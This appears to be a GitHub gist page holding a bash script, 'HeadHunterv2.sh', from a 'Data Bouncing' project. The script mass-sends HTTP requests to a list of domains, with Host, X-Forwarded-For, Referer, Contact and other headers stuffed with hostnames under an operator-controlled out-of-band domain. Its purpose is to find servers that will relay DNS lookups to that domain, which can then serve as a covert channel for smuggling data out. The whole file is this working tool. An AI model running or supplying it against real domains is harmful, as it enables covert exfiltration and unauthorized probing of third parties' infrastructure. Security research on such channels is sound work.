Last active
October 14, 2023 17:21
-
-
Save yosignals/70629556825ce29d8b1d21c61ecea683 to your computer and use it in GitHub Desktop.
HeadHunterv2.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# A hunter script from John & Dave's Data- Bouncing project https://thecontractor.io/data-bouncing/ | |
# This script will find candidates for smuggling data / coms / whatever starting as HTTP/S requests to domains, ending up in your DNS reciever to be rebuilt/read whatever | |
# dont forget to add your own OOB server, that could be interactsh or collaborator, or something esle, if you dont know what you're doing, go read the posts :) | |
# have fun, dont be a dick. | |
# Pre-flight check to verify and install necessary utilities | |
for utility in curl parallel bc; do | |
if ! command -v $utility &> /dev/null; then | |
read -p "$utility is not installed. Would you like to install it? (y/N) " yn | |
case $yn in | |
[Yy]* ) | |
if [[ $EUID -ne 0 ]]; then | |
echo "Please run this script as root or use sudo to install $utility." | |
exit 1 | |
fi | |
if command -v apt &> /dev/null; then | |
apt update && apt install -y $utility | |
elif command -v yum &> /dev/null; then | |
yum install -y $utility | |
else | |
echo "Could not find a package manager to install $utility. Please install it manually." | |
exit 1 | |
fi | |
;; | |
* ) | |
echo "$utility is required for this script to run. Exiting." | |
exit 1 | |
;; | |
esac | |
fi | |
done | |
# Default OOB domain | |
oob_domain="127.0.0.1/changeme" | |
# Header formats | |
declare -A headers | |
headers=( | |
["X-Forwarded-For"]="xff.%s.oob.com" | |
["X-Wap-Profile"]="wafp.%s.oob.com/wap.xml" | |
["CF-Connecting_IP"]="cfcon.%s.oob.com" | |
["Contact"]="root@contact.%s.oob.com" | |
["X-Real-IP"]="rip.%s.oob.com" | |
["True-Client-IP"]="trip.%s.oob.com" | |
["X-Client-IP"]="xclip.%s.oob.com" | |
["Forwarded"]="for=ff.%s.oob.com" | |
["X-Originating-IP"]="origip.%s.oob.com" | |
["Client-IP"]="clip.%s.oob.com" | |
["Referer"]="ref.%s.oob.com" | |
["From"]="root@from.%s.oob.com" | |
) | |
domains_file="domains.txt" # default domains file name | |
# Parse command-line arguments | |
while getopts ":o:d:" opt; do | |
case ${opt} in | |
o ) | |
oob_domain=$OPTARG | |
;; | |
d ) | |
domains_file=$OPTARG | |
;; | |
* ) | |
echo "Invalid option: -$OPTARG" >&2 | |
exit 1 | |
;; | |
esac | |
done | |
shift $((OPTIND -1)) | |
# User agent to use in the requests | |
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" | |
# Check if domains file exists | |
if [[ ! -f $domains_file ]]; then | |
echo "File $domains_file not found!" | |
exit 1 | |
fi | |
# Get the total number of non-empty lines in the domains.txt file | |
total_hosts=$(grep -c . "$domains_file") | |
# Create a log file | |
log_file="script_log_$(date +"%Y%m%d_%H%M%S").txt" | |
# Export variables for access in parallel jobs | |
export user_agent | |
export oob_domain | |
export total_hosts | |
export log_file | |
export headers | |
# Define a function to process each domain, to be run in parallel | |
process_domain() { | |
domain=$1 | |
current_host_number=$PARALLEL_SEQ | |
# Skip empty lines | |
[ -z "$domain" ] && return | |
# Calculate the percentage of completion | |
if (( total_hosts > 0 )); then | |
percentage_complete=$(bc <<< "scale=2; ($current_host_number / $total_hosts) * 100") | |
else | |
percentage_complete=0 | |
fi | |
# Construct headers for the current domain | |
curl_headers=( | |
-H $'User-Agent: '"${user_agent}" | |
-H $'Host: host.'"${domain}.${oob_domain}" | |
-H $'Origin: '"https://$domain" | |
) | |
for header in "${!headers[@]}"; do | |
formatted_header=$(printf "${headers[$header]}" "$domain") | |
curl_headers+=(-H "${header}: ${formatted_header}") | |
done | |
# Execute the curl command with the generated headers | |
curl -i -s -k -X $'GET' \ | |
--max-time 16 \ | |
"${curl_headers[@]}" \ | |
$'http://'"${domain}"'/' > /dev/null | |
# Create a log message with the progress report | |
timestamp=$(date +"%Y-%m-%d %H:%M:%S") | |
log_message="$timestamp - Request sent to $domain - $current_host_number of $total_hosts ($percentage_complete% complete)" | |
# Print the log message to the console | |
echo "$log_message" | |
# Log the message to the log file | |
echo "$log_message" >> "$log_file" | |
} | |
export -f process_domain | |
# Run the process_domain function in parallel for each line in the domains file | |
parallel -a "$domains_file" -j 100% process_domain |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment